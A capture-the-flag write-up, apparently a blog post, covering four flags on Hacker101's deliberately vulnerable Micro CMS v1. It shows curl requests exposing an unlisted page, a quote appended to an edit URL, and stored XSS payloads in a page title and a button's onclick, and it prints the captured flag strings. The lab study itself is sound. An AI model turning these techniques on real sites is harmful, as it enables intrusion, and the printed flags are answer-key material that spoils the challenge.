Hacker1 CTF - Micro CMS v1

4 flags on v1 of Hacker1's example CMS

Welcome to Part 2 of messing with Hacker1's CTF. If you haven't read it already, check out Part 1 for a warm up. The series continues with Part 3.

This challenge has 4 flags:

Flag 0

Try different URLs to find an unlisted but publicly readable page

$ curl http://35.237.57.141:5001/<instance hash>/page/4
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>403 Forbidden</title>
<h1>Forbidden</h1>
<p>You don't have the permission to access the requested resource. It is either read-protected or not readable by the server.</p>

Cool, we got a 403 Forbidden instead of a 404 Not Found. How about the edit path?

$ curl http://35.237.57.141:5001/<instance hash>/page/edit/4
<!doctype html>
<html>
	<head>
		<title>Edit page</title>
	</head>
	<body>
		<a href="../../">&lt;-- Go Home</a>
		<h1>Edit Page</h1>
		<form method="POST">
			Title: <input type="text" name="title" value="Private Page"><br>
			<textarea name="body" rows="10" cols="80">My secret is ^FLAG^b238d629214296f7b4912907362b8d65bc6f77c58d8015a4b39825558988e3fa$FLAG$</textarea><br>
			<input type="submit" value="Save">
			<div style="font-style: italic"><a href="https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet">Markdown</a> is supported, but scripts are not</div>
		</form>
	</body>
</html>

There we go, first one down.

Flag 1

If you try and put a <script></script> tag in the body of a page, it gets "scrubbed"

<!doctype html>
<html>
	<head>
		<title>Testing</title>
	</head>
	<body>
		<a href="../">&lt;-- Go Home</a><br>
		<a href="edit/10">Edit this page</a>
		<h1>Testing</h1>
<scrubbed>alert('xss')</scrubbed>
	</body>
</html>

I'm not sure if defeating the filtering logic is the point of this flag or if it's just preventing script tags because that's not part of this challenge. The hints for this flag haven't sufficiently clued me in yet, so I haven't captured this one.

Updated 2/11/2019: This flag requires that you add a quote or similar to a url for edit. I tried this in lots of ways but it appears to only get you a flag on an edit url like http://35.190.155.168:5001/76559cf5f4/page/edit/8'

Flag 2

If you alter the title of a page to include some html, and view it on the main page, you get this flag because the html in titles does not get sanitized.

<!doctype html>
<html>
	<head>
		<title>Micro-CMS</title>
	</head>
	<body>
		<ul>
<li><a href="page/1">Testing</a></li>
<li><a href="page/2"><script>alert("^FLAG^214934494cc2b080bc88b866bfdfe377d8ddd944ed158e383c0789850976af79$FLAG$");</script><i>Markdown Test</I.</a></li>
		</ul>
		<a href="page/create">Create a new page</a>
	</body>
</html>

Flag 3

You don't even need a script tag, you can just insert some javascript in the onclick of the <button> tag in the "Markdown Test" post:

<!doctype html>
<html>
	<head>
		<title>Markdown Test</title>
	</head>
	<body>
		<a href="../">&lt;-- Go Home</a><br>
		<a href="edit/2">Edit this page</a>
		<h1>Markdown Test</h1>
<p>Just testing some markdown functionality.</p>
<p><img alt="adorable kitten" src="https://cdn.4d4ms.com/img/A.jpg" /></p>
<p><button flag="^FLAG^f06f3bfbdacc28c0e6737a543b63b5a5d73d78c7591d4c2b9eabe12c1b60aae2$FLAG$" onclick="alert('xss')">Some button</button></p>
	</body>
</html>

3 out of 4 flags for us, I'll have to think about the hints given for flag 1. In the mean time, on to Part 3!